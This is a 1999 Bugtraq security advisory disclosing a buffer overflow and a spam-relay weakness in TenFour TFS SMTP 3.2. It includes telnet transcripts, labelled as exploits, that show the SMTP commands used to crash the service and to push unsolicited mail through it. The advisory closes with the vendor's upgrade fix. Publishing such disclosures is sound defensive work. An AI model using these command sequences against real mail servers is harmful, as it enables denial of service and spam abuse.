Subject: [SECURITY] TenFour TFS SMTP 3.2 Buffer Overflow To: BUGTRAQ@SECURITYFOCUS.COM INTRINsec Security Advisory Release Date : August 30, 1999 Software : TenFour TFS SMTP 3.2 Operating System: Windows NT 3.x / 4.x Impact : The attackers can use a misconfigured TFS SMTP for spamming and can remotely crash the TFS SMTP Gateway. Author : Christophe.Lesur@INTRINsec.com Status : TenFour is advised from this. URLs : http://www.intrinsec.com/ __ Diggest __ The TenFour TFS SMTP Release 3.2 has two vulnerabilities : A buffer overflow and, under some circumstances and due to inherent TFS architecture, it can be used for spamming. Direct results are that an attacker can remotly crash your TFS SMTP Gateway or send unsollicited mails to someone ( and TFS ADMINISTRATOR ). Tenfour is advised from this. Thanks to Roberto Correnti for his support. (http://www.tenfour.com) __ Technical Details and Exploits __ TENFOUR TFS SMTP Version 3.2 has two vulnerabilities : a buffer overflow and under some circumstances it can be used for spamming. First : Buffer Overflow. There is a major buffer overflow in TFS SMTP 3.2. When you connect to the SMTP service on port 25, you get the TFS PROMPT. After sending the 'helo' command, if you send a 'MAIL FROM' larger than 128 bytes, you will crash the SMTP service with a nice protection fault. It's basically a buffer overflow and this has been fixed in release 4.0 This is the exploit : [clesur@raptor clesur]$ telnet mailhost.victim.com 25 Trying 1.1.1.1... Connected to mailhost.victim.com. Escape character is '^]'. 220 mailhost.victim.com is ready. TFS SMTP Server ver 3.2 helo 250 mailhost.victim.com, Hello mail from: Connection closed by foreign host. Second : Spamming The TFS SMTP Engine accepts any mails by default and process them in its kernel. In case of a deficient message (wrong recipient, wrong domain...) TFS SMTP is usually configured to warn sender and the TFS ADMINISTRATOR by sending a 4-line warning AND the full message. Because there is no domain check before sending the message to the TFS core, it's possible to spam someone and the TFS administrator. This is the exploit : [clesur@raptor clesur]$ telnet mailhost.tfsvictim.com 25 Trying 1.1.1.1... Connected to mailhost.tfsvictim.com. Escape character is '^]'. 220 mailhost.tfsvictim.com is ready. TFS SMTP Server ver 3.2 helo 250 mailhost.tfsvictim.com, Hello mail from: 250 Sender OK rcpt to: 250 Recipient OK data 354 Begin data transfer. End with period. from: target@victim.com to: target@victim.com . 250 Message accepted quit 221 Connection closed Connection closed by foreign host. The spammed user will receive this message in its mailbox. Message 22: From target@victim.com Thu Jul 29 09:49:40 1999 Delivered-To: target@victim.com From: target@victim.com Date: Thu, 29 Jul 1999 11:44:03 +0200 Subject: MIME-version: 1.0 Content-transfer-encoding: quoted-printable #################################################### This message was not delivered to target@victim.com TFS Admin was informed with a copy of this message Sender was informed with a copy of this message #################################################### __ Solutions __ For theses vulnerabilities, TenFour suggests upgrading to a version greater than 4.0. __ Contacts __ -- Tenfour -- TenFour South Europe ITFamily Sarl Le Technoparc 15, rue Edouard Jeanneret 78306 Poissy Cedex France Tel: +33 1 39 22 65 15 Fax: +33 1 39 11 49 77 WWW: http://www.tenfour.fr -- INTRINsec -- INTRINsec is a computer Security company. http://www.INTRINsec.com This advisory is available in french. Cet avis est disponible en francais sur notre site. __ DISCLAMERS __ INTRINsec DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, AND PROVIDED THESES INFORMATIONS "AS IS" WITHOUT WARRANTY OF ANY KIND. INTRINsec IS NOT LIABLE FOR ANY DAMAGES WHATSOEVER EVEN IF INTRINsec HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. -- Christophe Lesur Security Consultant INTRINsec mailto:christophe.lesur@INTRINsec.com